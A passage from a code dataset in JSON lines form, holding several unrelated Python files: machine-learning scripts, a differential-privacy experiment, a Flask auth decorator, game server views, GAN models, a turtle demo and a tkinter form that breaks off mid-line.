plot_confusion_matrix,accuracy_score\r\ndf=pd.read_csv(\"zoo_data.csv\",header=None)\r\n\r\nprint(df.dtypes)\r\nprint(df[16].unique())\r\ny=df[16]\r\nX=df.drop(16, axis=1)\r\nprint(X.head())\r\nprint(y.unique())\r\nfor i in range(len(y)):\r\n if y[i] <= 4:\r\n y[i]=0\r\n else:\r\n y[i]=1\r\nprint(\"imp\")\r\nprint(y.unique()) \r\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=72,test_size=0.35)\r\nclf_dt = DecisionTreeClassifier(criterion='entropy',random_state=72)\r\nclf_dt = clf_dt.fit(X_train, y_train)\r\ny_pred=clf_dt.predict(X_test)\r\nprint(accuracy_score(y_pred,y_test)*100)\r\nprint(confusion_matrix(y_test, y_pred))\r\nplot_confusion_matrix(clf_dt, X_test, y_test)\r\nplt.figure(figsize=(15,7.5))\r\nplot_tree(clf_dt,class_names=[\"No\", \"Yes\"],feature_names=X.columns)","sub_path":"decisiontree.py","file_name":"decisiontree.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"187720907","text":"#MWEM_main.py\r\n#William Sexton\r\n#2/20/2017\r\n\r\n\"\"\"Implemation of Multiplicative Weights Exponential Mechanism algorithm\"\"\"\r\n\r\n#imports\r\nimport logging\r\nimport sys\r\nimport numpy as np\r\nfrom scipy import sparse\r\nfrom scipy import stats\r\nimport csv\r\nfrom data import Data\r\nimport MWEM\r\nimport query\r\n\r\n\r\ndef round_info(n,dimChi,epsilon,queries,data,mwemState,Q,iterations):\r\n logging.info('Worst error (relative to n): %s',np.max(abs(queries*(data-mwemState))/n))\r\n logging.info('MSE (relative to n): %s',np.sum(np.power((queries*(data-mwemState)/n),2)))\r\n logging.info('mean in synthetic histogram=%s',np.mean(mwemState))\r\n logging.info('mean in true histogram=%s',np.mean(data))\r\n logging.info('Std. Dev. in synthetic histogram=%s',np.std(mwemState))\r\n logging.info('Std. Dev. in true histogram=%s',np.std(data))\r\n A=data+np.finfo(float).eps\r\n B=mwemState+np.finfo(float).eps\r\n logging.info('KL Divergence=%s', stats.entropy(A/np.sum(A),B/np.sum(B)))\r\n guarantee=2*n*np.sqrt(np.log(dimChi)/iterations)+10*iterations*np.log(Q)/epsilon\r\n logging.info('error guarantee (relative to n): %s', guarantee/n)\r\n \r\n\r\ndef main():\r\n \"\"\"Configure log\"\"\"\r\n #Change filename to start new log otherwise info will append to current log\r\n logging.basicConfig(filename='MWEMacs.log',format='%(asctime)s %(message)s', level=logging.INFO)\r\n logging.info('Started')\r\n \r\n \"\"\"load data\"\"\"\r\n #Read data from csv file.\r\n logging.info('Reading file %s',sys.argv[1])\r\n data=Data(sys.argv[1]) \r\n n=data.n\r\n dimChi=data.dimChi\r\n logging.info('File loaded')\r\n \r\n \"\"\"Generate Queries\"\"\"\r\n logging.info('Generating queries')\r\n queries=query.build_queries(data.db,dimChi)\r\n Q=queries.shape[0]\r\n logging.info('Queries generated')\r\n \r\n \"\"\"algorithm parameters\"\"\"\r\n #iterations=round(((n*np.sqrt(np.log2(dimChi))*epsilon)/(10*np.log2(Q)))**(float(2)/3)) #optimal T from HLM\r\n iterations=3159\r\n repitions=3\r\n data=data.hist\r\n n=np.sum(data) \r\n dim=np.size(data)\r\n samples=30\r\n \r\n \"\"\"epsilon grid\"\"\"\r\n #grid_size=10\r\n #eps_grid=np.cumsum((1/float(grid_size))*np.ones(grid_size))\r\n eps_grid=[.0442] #for custom gird or single value\r\n grid_size=len(eps_grid)\r\n \r\n kl_measurements=np.zeros(grid_size)\r\n mse_measurements=np.zeros(grid_size)\r\n max_error_measurements=np.zeros(grid_size)\r\n \r\n \"\"\"Log parameters\"\"\"\r\n logging.info('Sample size=%s',n)\r\n logging.info('Size of universe=%s',dimChi)\r\n logging.info('Iterations=%s',iterations)\r\n logging.info('Samples=%s',samples)\r\n\r\n \"\"\"run MWEM\"\"\"\r\n #Generate samples for specified epsilon levels\r\n logging.info('Running MWEM')\r\n for samp in range(samples):\r\n for e in range(grid_size):\r\n epsilon=eps_grid[e]\r\n logging.info('epsilon=%s',epsilon)\r\n mwemState=MWEM.MWEM(data,n,dim,queries,iterations,repitions,epsilon)\r\n A=data+np.finfo(float).eps\r\n B=mwemState+np.finfo(float).eps\r\n round_info(n,dimChi,epsilon,queries,data,mwemState,Q,iterations)\r\n kl_measurements[e]=stats.entropy(A/np.sum(A),B/np.sum(B))\r\n max_error_measurements[e]=np.max(abs(queries*(data-mwemState))/n)\r\n mse_measurements[e]=np.sum(np.power((queries*(data-mwemState)/n),2))\r\n \r\n \r\n \r\n logging.debug('kl_measurements: %s', kl_measurements)\r\n logging.debug('max_error: %s', max_error_measurements)\r\n logging.debug('mse: %s', mse_measurements)\r\n \r\n #Save output to csv files\r\n #With each run of program, new sample data will be appended to the output files unless file names are changed\r\n with open('ACS_kl_measurements.csv','ab') as ofile:\r\n writer=csv.writer(ofile)\r\n writer.writerow(kl_measurements)\r\n with open('ACS_max_error_measurements.csv','ab') as ofile:\r\n writer=csv.writer(ofile)\r\n writer.writerow(max_error_measurements)\r\n with open('ACS_mse_measurements.csv','ab') as ofile:\r\n writer=csv.writer(ofile)\r\n writer.writerow(mse_measurements)\r\n logging.info('Finished')\r\n \r\n \r\nif __name__ == '__main__':\r\n np.random.seed(535)\r\n main()\r\n \r\n \r\n \r\n","sub_path":"programs/analysis/03_ACS_Income_MWEM/MWEM_main.py","file_name":"MWEM_main.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"194382752","text":"from functools import wraps\nfrom flask import request, current_app\n\nfrom ..service.auth_service import decode_token, split_bearer_token\nfrom ..util.exception import AuthenticationError, Forbidden, RequestError\n\n\ndef token_required(key, *permissions):\n \"\"\"\n :param key: the key for the resource being protected eg. user, portfolio\n :param permissions: list of permissions eg. login, reset, verify\n :return:\n \"\"\"\n def token_required(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n if not current_app.config['AUTH']:\n return f(*args, **kwargs)\n\n token = split_bearer_token(request.headers.get('Authorization'))\n payload = decode_token(token)\n\n if not payload.get('type') in permissions:\n raise AuthenticationError\n\n token_id = payload.get(key)\n if not token_id:\n raise AuthenticationError\n\n resource_public_id = kwargs.get(f'{key}_public_id')\n if not resource_public_id:\n raise RequestError\n\n if not token_id == resource_public_id:\n raise Forbidden\n\n return f(*args, **kwargs)\n\n return decorated\n\n return token_required\n","sub_path":"api/main/util/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"338985821","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Wang Chao'\n__date__ = '4/9/14'\n\nfrom core.stage import Stage, Hang, EliteStage, ActivityStage\nfrom core.attachment import standard_drop_to_attachment_protomsg\nfrom libs import pack_msg\nfrom utils.decorate import message_response, operate_guard, function_check\nfrom preset.data import STAGE_ACTIVITY\nfrom preset.settings import OPERATE_INTERVAL_PVE, OPERATE_INTERVAL_PVE_ELITE\n\nimport protomsg\n\n\n@message_response(\"ActivityStagePVEResponse\")\ndef activity_pve(request):\n req = request._proto\n stage = ActivityStage(request._char_id)\n\n s = STAGE_ACTIVITY[req.stage_id]\n if s.tp == 1:\n battle_msg = stage.battle_type_one(req.stage_id)\n else:\n battle_msg = stage.battle_type_two(req.stage_id)\n\n if battle_msg.self_win:\n drop = stage.save_drop()\n else:\n drop = {}\n\n response = protomsg.ActivityStagePVEResponse()\n response.ret = 0\n response.stage_id = req.stage_id\n response.battle.MergeFrom(battle_msg)\n if drop:\n response.drop.MergeFrom(standard_drop_to_attachment_protomsg(drop))\n\n return pack_msg(response)\n\n\n\n@message_response(\"ElitePVEResponse\")\n@operate_guard('elite_pve', OPERATE_INTERVAL_PVE_ELITE, keep_result=False)\n@function_check(11)\ndef elite_pve(request):\n req = request._proto\n stage = EliteStage(request._char_id)\n\n battle_msg = stage.battle(req.stage_id)\n if battle_msg.self_win:\n drop = stage.save_drop()\n else:\n drop = {}\n\n response = protomsg.ElitePVEResponse()\n response.ret = 0\n response.stage_id = req.stage_id\n response.battle.MergeFrom(battle_msg)\n if drop:\n response.drop.MergeFrom(standard_drop_to_attachment_protomsg(drop))\n\n return pack_msg(response)\n\n\n\n@message_response(\"PVEResponse\")\n@operate_guard('pve', OPERATE_INTERVAL_PVE, keep_result=False)\ndef pve(request):\n req = request._proto\n stage = Stage(request._char_id)\n battle_msg = stage.battle(req.stage_id)\n\n if battle_msg.self_win:\n drop = stage.save_drop(req.stage_id, first=stage.first, star=stage.first_star)\n else:\n drop = {}\n\n response = protomsg.PVEResponse()\n response.ret = 0\n response.stage_id = req.stage_id\n response.battle.MergeFrom(battle_msg)\n if drop:\n response.drop.MergeFrom(standard_drop_to_attachment_protomsg(drop))\n\n return pack_msg(response)\n\n\n@message_response(\"HangResponse\")\n@function_check(7)\ndef hang_start(request):\n req = request._proto\n char_id = request._char_id\n\n hang = Hang(char_id)\n hang.start(req.stage_id)\n return None\n\n\n@message_response(\"HangCancelResponse\")\ndef hang_cancel(request):\n hang = Hang(request._char_id)\n hang.cancel()\n\n return None\n\n","sub_path":"sanguo/views/stage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"349711751","text":"import numpy as np\r\nimport torch\r\nimport cv2\r\nimport glob\r\nimport os\r\n\r\ngts=glob.glob('./CamVid/testtarget_changed/*.png')\r\niou_array=glob.glob('./CamVid/Prediction/test/model9/*.png')\r\n\r\n# gts=glob.glob('./CamVid/traintarget_changed/*.png')\r\n# iou_array=glob.glob('./CamVid/Prediction/train/*.png')\r\n\r\n# gts=glob.glob('./CamVid/valtarget_changed/*.png')\r\n# iou_array=glob.glob('./CamVid/Prediction/val/*.png')\r\n\r\n# gts=glob.glob('./CamVid/real_annotation_changed/*.png')\r\n# iou_array=glob.glob('./DJI_Test/*.jpg')\r\n\r\ndef iou_mean(pred, target, n_classes = 7):\r\n\r\n ious = []\r\n iousSum = 0\r\n pred = torch.from_numpy(pred)\r\n pred = pred.view(-1)\r\n\r\n target = np.array(target)\r\n target = torch.from_numpy(target)\r\n target = target.view(-1)\r\n\r\n\r\n for cls in range(0, n_classes):\r\n pred_inds = pred == cls\r\n\r\n target_inds = target == cls\r\n\r\n intersection = (pred_inds[target_inds]).long().sum().data.cpu().item()\r\n\r\n union = pred_inds.long().sum().data.cpu().item() + target_inds.long().sum().data.cpu().item() - intersection\r\n\r\n if union == 0:\r\n ious.append(float('nan'))\r\n n_classes=n_classes-1\r\n else:\r\n ious.append(float(intersection) / float(max(union, 1)))\r\n iousSum += float(intersection) / float(max(union, 1))\r\n return iousSum/n_classes\r\n\r\n# for i in range(len(gts)):\r\n# pred=cv2.imread(iou_array[i])\r\n# gt=cv2.imread(gts[i])\r\n# pred=pred.transpose((2,0,1))\r\n# gt=gt.transpose((2,0,1))\r\n# pred=pred[0]\r\n# gt=gt[0]\r\n# print(iou_mean(pred,gt,7))\r\nchange_anno2=[0,1,2,3,4,5,6,7]\r\n\r\ncmap2=[[64, 0, 128],\r\n [128, 64, 128],\r\n [0, 0, 192],\r\n [128, 128, 0],\r\n [64, 64, 0],\r\n [128, 0, 0],\r\n [192, 192, 128],\r\n [0,0,0]]\r\n\r\ncmap2=np.array(cmap2)\r\n\r\nimages_miou=0\r\n\r\nsize=(360,480)\r\nsize2=(2160,3840)\r\n\r\nfor l in range(len(gts)):\r\n pred=cv2.imread(iou_array[l])\r\n gt=cv2.imread(gts[l])\r\n\r\n pred2=np.zeros(size)\r\n gt2=np.zeros(size)\r\n\r\n for i in range(pred.shape[0]):\r\n for j in range(pred.shape[1]):\r\n if((pred[i][j]==cmap2[0]).all()):\r\n pred2[i][j]=0\r\n elif ((pred[i][j] == cmap2[1]).all()):\r\n pred2[i][j] = 1\r\n elif ((pred[i][j] == cmap2[2]).all()):\r\n pred2[i][j] = 2\r\n elif ((pred[i][j] == cmap2[3]).all()):\r\n pred2[i][j] = 3\r\n elif ((pred[i][j] == cmap2[4]).all()):\r\n pred2[i][j] = 4\r\n elif ((pred[i][j] == cmap2[5]).all()):\r\n pred2[i][j] = 5\r\n elif ((pred[i][j] == cmap2[6]).all()):\r\n pred2[i][j] = 6\r\n elif ((pred[i][j] == cmap2[7]).all()):\r\n pred2[i][j] = 7\r\n if ((gt[i][j] == cmap2[0]).all()):\r\n gt2[i][j] = 0\r\n elif ((gt[i][j] == cmap2[1]).all()):\r\n gt2[i][j] = 1\r\n elif ((gt[i][j] == cmap2[2]).all()):\r\n gt2[i][j] = 2\r\n elif ((gt[i][j] == cmap2[3]).all()):\r\n gt2[i][j] = 3\r\n elif ((gt[i][j] == cmap2[4]).all()):\r\n gt2[i][j] = 4\r\n elif ((gt[i][j] == cmap2[5]).all()):\r\n gt2[i][j] = 5\r\n elif ((gt[i][j] == cmap2[6]).all()):\r\n gt2[i][j] = 6\r\n elif ((gt[i][j] == cmap2[7]).all()):\r\n gt2[i][j] = 7\r\n print(f'{l} : {iou_mean(pred2,gt2)}')\r\n images_miou+=iou_mean(pred2,gt2)\r\nprint('---')\r\nprint(images_miou/len(gts))","sub_path":"mIOU.py","file_name":"mIOU.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"441375128","text":"from stable_baselines.common.env_checker import check_env\nfrom simple_SIR_env import simple_SIR_env\n\n# Initiate the env\nS0 = 999 # number of susceptibles at time = 0\nI0 = 1 # number of infected at time = 0\nR0 = 0 # number of recovered (and immune) at time = 0\nhospitalCapacity = 300 # maximum number of people in the ICU\nenv = simple_SIR_env(S0, I0, R0, hospitalCapacity)\n\n# Check the environment\ncheck_env(env)\n\n'''\nNote: you may get many warnings about future versions of some python packages,\nbut from my experience, you can ignore these warnings. Will work on resolving\nthis.\n'''\n","sub_path":"COVID19_env/check_env.py","file_name":"check_env.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"215086940","text":"import turtle \nUP = 0\nLEFT = 1\nDOWN = 2\nRIGHT = 3\ndirection = UP\nUP_ARROW = \"Up\"\nLEFT_ARROW = \"Left\"\nDOWN_ARROW = \"Down\"\nRIGHT_ARROW = \"Right\"\nSPACE_BAR = \"space\"\ndef up():\n global dirction\n direction = UP\n print(\"you pressed up\")\n turtle.pos()\n old_pos = turtle.pos()\n x= old_pos[0]\n y= old_pos[1]\n turtle.goto(x , y+10)\n print(turtle.pos)\ndef down():\n global direction\n direction = DOWN\n print(\"you pressed down\")\n turtle.pos()\n old_pos = turtle.pos()\n x= old_pos[0]\n y= old_pos[1]\n turtle.goto(x , y-10)\n print(turtle.pos)\n \ndef left ():\n global dirction\n direction = LEFT\n print(\"you pressed left\")\n turtle.pos()\n old_pos = turtle.pos()\n x= old_pos[0]\n y= old_pos[1]\n turtle.goto(x -10,y)\n print(turtle.pos)\ndef right ():\n global direction\n direction = RIGHT\n print(\"you pressed right\")\n turtle.pos()\n old_pos = turtle.pos()\n x= old_pos[0]\n y= old_pos[1]\n turtle.goto(x+10 , y)\n print(turtle.pos)\n \nturtle.onkeypress(up,UP_ARROW)\nturtle.onkeypress(down,DOWN_ARROW)\nturtle.onkeypress(left,LEFT_ARROW)\nturtle.onkeypress(right,RIGHT_ARROW)\nturtle.onkeypress(turtle.stamp, SPACE_BAR)\nturtle.listen()\n","sub_path":"funturtle2.py","file_name":"funturtle2.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"387261532","text":"from keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Conv2D, MaxPooling2D\nfrom keras.optimizers import SGD, Adam, RMSprop\n\n\n# 定义网络\nclass Net:\n @staticmethod\n def build(input_shape, classes):\n # conv - conv - maxpool - dropout - conv - conv - maxpool - dense - dropout - dense\n model = Sequential()\n\n # 1) conv\n model.add(Conv2D(filters=32, kernel_size=3, padding=\"same\", input_shape=input_shape))\n model.add(Activation(\"relu\"))\n\n # 2) conv\n model.add(Conv2D(filters=32, kernel_size=3, padding=\"same\"))\n model.add(Activation(\"relu\"))\n\n # 3) maxpool\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n\n # 4) dropout\n model.add(Dropout(0.25))\n\n # 5) conv\n model.add(Conv2D(filters=64, kernel_size=3, padding=\"same\"))\n model.add(Activation(\"relu\"))\n\n # 6) conv\n model.add(Conv2D(filters=64, kernel_size=3, padding=\"same\"))\n model.add(Activation(\"relu\"))\n\n # 7) maxpool\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(0.25))\n\n # 8) dense\n model.add(Flatten())\n model.add(Dense(512))\n model.add(Activation(\"relu\"))\n\n # 9) dropout\n model.add(Dropout(0.5))\n\n # 10) dense\n model.add(Dense(classes))\n\n # 11) output\n model.add(Activation(\"softmax\"))\n model.summary()\n\n # 12) 返回模型\n return model","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"586416753","text":"__author__ = 'LuizArthur'\r\n\r\nimport os\r\nimport time\r\nimport Calc\r\nimport matplotlib.pyplot as pp\r\n\r\ntempo = time.clock()\r\n\r\nmain = os.getcwd()\r\nInput = os.path.join(main, \"Input\")\r\nOutput = os.path.join(main, \"Output\")\r\n\r\nif not os.path.exists(Output):\r\n os.mkdir(Output)\r\n\r\nfile_name = []\r\nfile_initiate_name = os.path.join(Input, \"Input.txt\")\r\nfile_initiate = open(file_initiate_name, \"r\")\r\n\r\nfor line in file_initiate:\r\n file_name.append(line.strip().split(\" \"))\r\n\r\nfile_initiate.close()\r\n\r\ncount_plot = 0\r\n\r\nfor name in file_name[0]:\r\n #print(name)\r\n path_name = os.path.join(Input, name)\r\n #print(path_name)\r\n if os.path.exists(path_name):\r\n with open(path_name) as file:\r\n Var_txt = []\r\n for line in file:\r\n Var_txt.append(line.strip().split(\" \"))\r\n\r\n file.close()\r\n\r\n calc = Calc.CALC(Var_txt, count_plot, name)\r\n count_plot = calc.show_count_plot()\r\n else:\r\n print(\"File \"+path_name+\" nao existe\")\r\n\r\nprint(\"\\nTempo de execucao: \", time.clock()-tempo)\r\npp.show()\r\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"142256659","text":"#!/usr/bin/env python\nimport numpy\n\nimport chainer\nfrom chainer.backends import cuda\nimport chainer.functions as F\nimport chainer.links as L\nfrom chainer import Variable\nimport numpy as np\n\n\ndef add_noise(h, sigma=0.1):\n xp = chainer.cuda.get_array_module(h.data)\n return h + sigma * xp.random.randn(*h.data.shape)\n\n\nclass conv_Layer(chainer.Chain):\n def __init__(self, ch_in, ch_out, ksize=(5, 1), stride=(1, 1), pad=(2, 0), wscale=0.02, normalize=False):\n w = chainer.initializers.Normal(wscale)\n super(conv_Layer, self).__init__(\n conv = L.Convolution2D(ch_in, ch_out, ksize, stride, pad, initialW=w),\n bn = L.BatchNormalization(ch_out)\n )\n self.normalize = normalize\n\n def __call__(self, x):\n h = x\n h = self.conv(h)\n if self.normalize:\n h = self.bn(h)\n return h\n\n\nclass deconv_Layer(chainer.Chain):\n def __init__(self, ch_in, ch_out, ksize=(3, 1), stride=(1, 1), pad=(2, 0), wscale=0.02, normalize=False):\n w = chainer.initializers.Normal(wscale)\n super(deconv_Layer, self).__init__(\n deconv = L.Deconvolution2D(ch_in, ch_out, ksize, stride, pad, initialW=w),\n bn = L.BatchNormalization(ch_out)\n )\n self.normalize = normalize\n\n def __call__(self, x):\n h = x\n h = self.deconv(h)\n if self.normalize:\n h = self.bn(h)\n return h\n\nclass GFirstBlock(chainer.Chain):\n def __init__(self, ch_in, ch_out, outsize):\n super(GFirstBlock, self).__init__(\n c0 = conv_Layer(ch_in, ch_in, ksize=(3, 3), stride=(1, 3), pad=(1, 1), normalize=True),\n c1 = conv_Layer(ch_in, ch_out, ksize=(3, 32), stride=(1, 1), pad=(1, 0), normalize=True),\n l0 = L.Linear(None, ch_out * 2),\n dc0 = deconv_Layer(ch_out // 32, ch_out, ksize=(4, 1), stride=(2, 1), pad=(1, 0), normalize=True),\n dc1 = deconv_Layer(ch_out, ch_out, ksize=(3, 3), stride=(1, 3), pad=(1, 0), normalize=True),\n c2 = conv_Layer(ch_out, 1, ksize=(3, 1), stride=(1, 1), pad=(1, 0),normalize=True),\n )\n self.ch_in = ch_in\n self.ch_out = ch_out\n self.outsize = outsize\n\n def __call__(self, x, z, last=False):\n l0 = F.leaky_relu(self.c0(x))\n l1 = F.leaky_relu(self.c1(l0))\n l1 = F.reshape(l1, (l1.shape[0], self.ch_out // 32, l1.shape[2], 32))\n l2 = l1 + F.reshape(self.l0(z), (l1.shape[0], l1.shape[1], l1.shape[2], l1.shape[3]))\n l3 = F.leaky_relu(self.dc0(l2)) #upsampling\n if last:\n return self.c2(F.leaky_relu(self.dc1(l3)))\n return l3\n\nclass GBlock(chainer.Chain):\n def __init__(self, ch_in, ch_out, outsize):\n super(GBlock, self).__init__(\n #c0 = conv_Layer(ch_in, ch_in, ksize=(3, 3), stride=(1, 3), pad=(1, 1), normalize=True),\n c1 = conv_Layer(ch_in, ch_out, ksize=(3, 32), stride=(1, 1), pad=(1, 0), normalize=True),\n dc0 = deconv_Layer(ch_out // 32, ch_out, ksize=(4, 1), stride=(2, 1), pad=(1, 0), normalize=True),\n dc1 = deconv_Layer(ch_out, ch_out, ksize=(3, 3), stride=(1, 3), pad=(1, 0), normalize=True),\n c2 = conv_Layer(ch_out, 1, ksize=(3, 1), stride=(1, 1), pad=(1, 0),normalize=True),\n )\n self.ch_in = ch_in\n self.ch_out = ch_out\n self.outsize = outsize\n\n def __call__(self, x, z, last=False):\n #l0 = F.leaky_relu(self.c0(x))\n #input shape is (batch, ch_in, length, 32)\n l1 = F.leaky_relu(self.c1(x))\n l1 = F.reshape(l1, (l1.shape[0], self.ch_out // 32, l1.shape[2], 32))\n l2 = F.leaky_relu(self.dc0(l1)) #upsampling\n if last:\n return self.c2(F.leaky_relu(self.dc1(l2)))\n return l2\n\n\nclass Generator(chainer.Chain):\n def __init__(self, depth, top_ch = 64):\n super(Generator, self).__init__(\n b0 = GFirstBlock(1, top_ch, (4, 32)),\n b1 = GBlock(top_ch, top_ch, (8, 32)),\n b2 = GBlock(top_ch, top_ch // 2, (16, 32)),\n b3 = GBlock(top_ch // 2, top_ch // 2, (32, 32)),\n b4 = GBlock(top_ch // 2, top_ch // 2, (64, 32)),\n b5 = GBlock(top_ch // 2, top_ch // 2, (128, 32)),\n b6 = GBlock(top_ch // 2, top_ch // 2, (256, 32)),\n )\n\n self.depth = depth\n\n def make_hidden(self, sz):\n z = self.xp.random.randn(sz, 128, 1, 1).astype('float32')\n return z\n\n def __call__(self, x, z, alpha=1.0):\n if self.depth > 0 and alpha < 1.0:\n h = x #x = keypose\n for i in range(self.depth-1):\n h = self['b%d'%i](h, z)\n\n h1 = self['b%d'%(self.depth-1)](h, z)\n h2 = F.unpooling_2d(h1, (2, 1), (2, 1), outsize=self['b%d'%self.depth].outsize)\n h3 = self['b%d'%self.depth-1].c2(F.leaky_relu(self['b%d'%self.depth-1].dc1(h2)))\n h4 = self['b%d'%self.depth](h1, z, True)\n h = h3 * (1 - alpha) + h4 * alpha\n else:\n h = x\n for i in range(self.depth):\n h = self['b%d'%i](h, z)\n h = self['b%d'%self.depth](h, z, True)\n h = F.concat((F.reshape(x[:,:,0,:], (x.shape[0],x.shape[1],1,x.shape[3])), h[:,:,1:,:]), axis=2)\n h = F.concat((h[:,:,:h.shape[2]-1,:], F.reshape(x[:,:,1,:], (x.shape[0],x.shape[1],1,x.shape[3]))), axis=2)\n return h\n\nclass DBlock(chainer.Chain):\n def __init__(self, ch_in, ch_out):\n super(DBlock, self).__init__(\n c0_0 = conv_Layer(1, ch_in, ksize=(3, 3), stride=(1, 3), pad=(1, 1), normalize=False),\n c0_1 = conv_Layer(ch_in, ch_in, ksize=(3, 3), stride=(1, 1), pad=(1, 1), normalize=False),\n c1 = conv_Layer(ch_in, ch_out, ksize=(3, 32), stride=(1, 1), pad=(1, 0), normalize=False),\n c2 = conv_Layer(ch_out // 32, ch_out, ksize=(3, 1), stride=(2, 1), pad=(1, 0),normalize=False),\n )\n self.ch_in = ch_in\n self.ch_out = ch_out\n\n def __call__(self, x, first=False):\n if first:\n l0 = F.leaky_relu(self.c0_0(x))\n else:\n l0 = F.leaky_relu(self.c0_1(x))\n l1 = F.leaky_relu(self.c1(l0))\n l2 = F.reshape(l1, (l1.shape[0], self.ch_out // 32, l1.shape[2], 32))\n l3 = F.leaky_relu(self.c2(l2))\n return l3\n\nclass DLastBlock(chainer.Chain):\n def __init__(self, ch_in, ch_out):\n super(DLastBlock, self).__init__(\n c0_0 = conv_Layer(1, ch_in, ksize=(3, 3), stride=(1, 3), pad=(1, 1), normalize=False),\n c0_1 = conv_Layer(ch_in, ch_in, ksize=(3, 3), stride=(1, 1), pad=(1, 1), normalize=False),\n c1 = conv_Layer(ch_in, ch_out, ksize=(3, 32), stride=(1, 1), pad=(1, 0), normalize=False),\n c2 = conv_Layer(ch_out // 32, ch_out, ksize=(3, 1), stride=(2, 1), pad=(1, 0),normalize=False),\n #stddev = MinibatchStddev(ch_in),\n )\n self.ch_in = ch_in\n self.ch_out = ch_out\n\n def __call__(self, x, first=False):\n if first:\n l0 = F.leaky_relu(self.c0_0(x))\n else:\n l0 = F.leaky_relu(self.c0_1(x))\n #l0 = self.stddev(l0)\n l1 = F.leaky_relu(self.c1(l0))\n l1 = F.reshape(l1, (l1.shape[0], self.ch_out // 32, l1.shape[2], 32))\n l2 = self.c2(l1)\n return l2\n\n\nclass Discriminator(chainer.Chain):\n def __init__(self, depth, wscale=0.02, top_ch = 32):\n w = chainer.initializers.Normal(wscale)\n super(Discriminator, self).__init__(\n b1 = DBlock(top_ch, top_ch),\n b2 = DBlock(top_ch, top_ch),\n b3 = DBlock(top_ch, top_ch * 2),\n b4 = DBlock(top_ch * 2, top_ch * 2),\n b5 = DBlock(top_ch * 2, top_ch * 4),\n b6 = DBlock(top_ch * 2, top_ch * 2),\n b7 = DLastBlock( top_ch * 2, top_ch * 2),\n l0 = L.Linear(None, 1, initialW=w),\n )\n\n self.depth = depth\n\n def __call__(self, x, alpha=1.0):\n xn = add_noise(x)\n if self.depth > 0 and alpha < 1:\n h1 = self['b%d'%(7-self.depth)](xn, True)\n x2 = F.average_pooling_2d(xn, (2, 1), (2, 1))\n h2 = F.leaky_relu(self['b%d'%(7-self.depth+1)].c0_0(x2))\n h = h2 * (1 - alpha) + h1 * alpha\n else:\n h = self['b%d'%(7-self.depth)](xn, True)\n\n for i in range(self.depth):\n h = self['b%d'%(7-self.depth+1+i)](h)\n\n h = F.sigmoid(self.l0(h))\n h = F.flatten(h)\n return h\n\n\nclass PosewiseDiscriminator(chainer.Chain):\n def __init__(self, wscale=0.02):\n w = chainer.initializers.Normal(wscale)\n super(PosewiseDiscriminator, self).__init__()\n with self.init_scope():\n self.c0 = conv_Layer(1, 64, ksize=(1, 3), stride=(1, 3), pad=(0, 1), normalize=True)\n self.c1 = conv_Layer(64, 64, ksize=(1, 32), stride=(1, 1), pad=(0, 0), normalize=True)\n self.c2 = conv_Layer(64, 1, ksize=(1, 1), stride=(1, 1), pad=(0, 0), normalize=True)\n #self.stddev = MinibatchStddev(1)\n\n def __call__(self, x):\n xp = cuda.get_array_module(x.data)\n h = add_noise(x)\n h = F.leaky_relu(self.c0(h))\n h = F.leaky_relu(self.c1(h))\n h = F.leaky_relu(self.c2(h))\n h = F.sigmoid(h)\n h = F.flatten(h)\n return h\n\n\nclass MinibatchStddev(chainer.Link):\n def __init__(self, ch):\n super(MinibatchStddev, self).__init__()\n\n self.eps = 1.0\n\n def __call__(self, x):\n mean = F.mean(x, axis=0, keepdims=True)\n dev = x - F.broadcast_to(mean, x.shape)\n devdev = dev * dev\n var = F.mean(devdev, axis=0, keepdims=True) # using variance instead of stddev\n # stddev = my_sqrt(var + self.eps)\n # stddev_mean = F.mean(stddev)\n stddev_mean = F.mean(var)\n new_channel = F.broadcast_to(stddev_mean, (x.shape[0], 1, x.shape[2], x.shape[3]))\n h = F.concat((x, new_channel), axis=1)\n return h\n","sub_path":"core/models/net4.py","file_name":"net4.py","file_ext":"py","file_size_in_byte":9935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"227750946","text":"from tkinter import *\r\nroot= Tk()\r\nroot.geometry(\"400x300+10+10\")\r\nroot.title(\"Admission Form\")\r\nvar= IntVar()\r\n\r\nl=Label(root,text=\"Admission Form\",width=15,font=(\"Bold\",20))\r\nl.place(x=90,y=53)\r\n\r\nl1=Label(root,text=\"Enter First Name\",width=15,font=(\"Bold\",10))\r\nl1.place(x=80,y=130)\r\n\r\ne1=Entry(root)\r\ne1.place(x=240,y=130)\r\n\r\nl2=Label(root,text=\"Enter Last 